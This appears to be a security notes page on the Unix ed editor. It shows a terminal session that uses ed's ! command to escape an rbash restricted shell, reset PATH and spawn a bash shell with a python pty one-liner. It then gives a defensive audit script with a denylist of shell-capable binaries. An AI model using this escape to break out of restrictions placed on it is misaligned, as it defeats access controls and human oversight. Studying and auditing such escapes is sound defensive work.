ed

The ed binary is a line-oriented text editor that dates back to the early days of Unix. It operates entirely in the terminal and is designed for editing files through concise command sequences rather than visual interaction. While its interface is minimal and unintuitive by modern standards, its presence is nearly guaranteed on Unix-like systems, including minimal or recovery environments where more feature-rich editors like vi or nano might not be available.

Despite being rarely used directly by users today, ed remains part of many default installations due to its small footprint and historical significance. In offensive security contexts, the presence of ed can be valuable, particularly in restricted shell environments or when facing limited binary availability. It enables file manipulation, code injection, or persistence mechanisms without requiring additional tooling, making it a stealthy option for modifying scripts or system files when visibility needs to be minimized.

As an example, the ed binary can be used to escape rbash: its ! command starts /bin/sh, an unrestricted shell in which the PATH variable can be modified:

# Common binaries are restricted
x7331@kali:~$ id
-rbash: id: command not found

# The restriction is due to the PATH environment variable
x7331@kali:~$ echo $PATH
/home/x7331/bin

# The variable cannot be modified
x7331@kali:~$ export PATH=$PATH:/usr/bin/
-rbash: PATH: readonly variable

# The ed binary can be used for PATH variable modification
x7331@kali:~$ ed
!/bin/sh
$ export PATH=/bin:/usr/bin:$PATH

$ echo $PATH
/bin:/usr/bin:/home/x7331/bin

# Common binaries can now be used
$ id
uid=1000(x7331) gid=1000(x7331) groups=1000(x7331)

# Get an interactive shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
x7331@kali:~$ id
x7331@kali:~$ export PATH=/usr/bin:/bin:$PATH
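
A defender-side check for the escape shown above, as an added example that is not part of the original page: it audits the directory a restricted user's PATH points to and flags entries that are, or resolve to, ed, python or a shell. The function names and the denylist are assumptions limited to the tools this page uses; extend the list to match local policy.

```sh
#!/bin/sh
# Added example: audit an rbash command directory for shell-capable binaries.
# Usage (after sourcing this file): audit_rbash_bin /home/x7331/bin
# Requires readlink -f (GNU coreutils) to resolve symlinks.

# Assumed denylist: only the tools the page shows spawning a shell.
is_shell_capable() {
    case "$1" in
        ed|python*|sh|bash) return 0 ;;
        *) return 1 ;;
    esac
}

# Prints one FINDING line per risky entry; returns 0 only if none are found.
audit_rbash_bin() {
    dir=$1
    findings=0
    for entry in "$dir"/*; do
        [ -e "$entry" ] || continue
        # Resolve symlinks so a renamed link to ed is still caught.
        target=$(readlink -f -- "$entry") || continue
        if is_shell_capable "$(basename -- "$entry")" ||
           is_shell_capable "$(basename -- "$target")"; then
            printf 'FINDING %s -> %s\n' "$entry" "$target"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}
```

Where a restricted user genuinely needs a line editor, GNU ed's restricted mode (red) cannot execute shell commands, so it does not offer the ! escape used above.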
